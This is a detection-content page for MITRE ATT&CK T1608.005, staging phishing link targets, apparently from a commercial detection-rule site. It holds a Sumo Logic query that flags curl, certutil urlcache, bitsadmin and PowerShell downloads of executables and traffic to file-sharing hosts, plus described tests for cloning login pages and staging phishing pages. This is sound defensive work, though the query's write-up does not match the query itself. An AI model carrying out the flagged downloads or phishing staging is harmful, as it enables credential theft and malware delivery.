Detect Link Target in Sumo Logic CSE
Adversaries stage resources at link targets that are later delivered to victims via phishing campaigns (T1566.002, T1598.003) or malicious links (T1204.001). Link targets typically include cloned login pages for credential harvesting, malware download pages, or redirect chains through URL shorteners and trusted PaaS platforms. Because this activity occurs on adversary-controlled infrastructure before the victim is targeted, direct detection is impossible from within the victim environment. Detection must focus on downstream indicators: email security telemetry revealing delivered URLs pointing to suspicious infrastructure, endpoint browser telemetry showing user connections to phishing link targets, DNS queries to homoglyph or typosquatted domains, and proxy logs capturing connections to known link-staging platforms such as IPFS gateways, URL shorteners, and cloud PaaS providers abused for redirecting victims.
MITRE ATT&CK
- Tactic
- Resource Development
- Technique
- T1608 Stage Capabilities
- Sub-technique
- T1608.005 Link Target
- Canonical reference
- https://attack.mitre.org/techniques/T1608/005/
Sumo Detection Query
_sourceCategory=endpoint/windows OR _sourceCategory=proxy/access | json auto | where (process_name in ("curl.exe", "wget.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe") and (command_line matches "*.exe" or command_line matches "*.dll" or command_line matches "*.bin")) or (url matches "*transfer.sh*" or url matches "*paste.ee*" or url matches "*gofile.io*") | if(matches(process_name, "*certutil*") and matches(command_line, "*urlcache*"), "High", if(matches(url, "*transfer.sh*") or matches(url, "*gofile.io*"), "High", "Medium")) as RiskLevel | count by src_ip, process_name, RiskLevel | sort by count descSumo Logic query for T1608.005 detection using source category filters and aggregation. Detects adversary-staged phishing link targets by analyzing delivered email URLs via Microsoft Defen
Data Sources
Required Tables
False Positives & Tuning
- Legitimate marketing emails using URL shorteners (bit.ly, ow.ly) for campaign tracking — common in newsletters and vendor communications
- Internal developer tools and previews legitimately hosted on Netlify, Vercel, or Azure App Services — especially from known SaaS vendors or IT teams
- Security awareness training platforms (KnowBe4, Proofpoint Security Awareness) that intentionally send simulated phishing links through URL shorteners
- IPFS-hosted decentralized applications (dApps), NFT metadata, or legitimate Web3 projects linked in business communications
- SaaS vendor onboarding emails with redirect links through PaaS infrastructure as part of legitimate SSO flows
Other platforms for T1608.005
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Clone Legitimate Login Page for Credential Harvesting Infrastructure
Expected signal: Linux process audit log (auditd) showing wget execution with --mirror flag and target URL. DNS query for your-test-domain.example.com in DNS server logs. HTTP GET requests in proxy logs originating from the test host. Sysmon EventCode=1 equivalent on Linux (if Sysmon for Linux deployed) showing wget process with full command line arguments.
- Test 2Stage Phishing Link Target on IPFS via Pinata
Expected signal: Process creation log showing curl execution with api.pinata.cloud as destination. DNS query for api.pinata.cloud. Outbound HTTPS connection in network logs. The returned JSON will contain the IPFS CID (IpfsHash field) which serves as the permanent link target address accessible via https://gateway.pinata.cloud/ipfs/<CID>. When the CID link is later visited, gateway connection logs will show /ipfs/<CID> path pattern.
- Test 3Register URL Shortener Redirect to Phishing Page
Expected signal: Process creation showing curl with api-ssl.bitly.com destination. DNS query for api-ssl.bitly.com. HTTPS POST request in proxy/network logs. The returned JSON contains the 'link' field with the bit.ly short URL. When this URL is subsequently sent in a test phishing email and clicked, email security tools (Defender for Office 365) will record the bit.ly URL in EmailUrlInfo, triggering the main KQL detection with LinkCategory='URLShortener'.
- Test 4Deploy Phishing Link Target on Azure App Service (PaaS Infrastructure)
Expected signal: Azure Activity Log entries showing App Service creation and deployment (ResourceProvider: Microsoft.Web). If a user navigates to the *.azurewebsites.net URL, DeviceNetworkEvents shows browser connection with RemoteUrl containing 'azurewebsites.net'. Azure Monitor logs capture all access to the App Service including source IPs, user agents, and request paths.
References (12)
- https://attack.mitre.org/techniques/T1608/005/
- https://blog.talosintelligence.com/ipfs-abuse/
- https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection
- https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service
- https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/
- https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian
- https://www.kaspersky.com/blog/malicious-redirect-methods/50045/
- https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse
- https://cofense.com/blog/major-energy-company-targeted-in-large-qr-code-campaign/
- https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailurlinfo-table
- https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-emailevents-table
Unlock Pro Content
Get the full detection package for T1608.005 including response playbook, investigation guide, and atomic red team tests.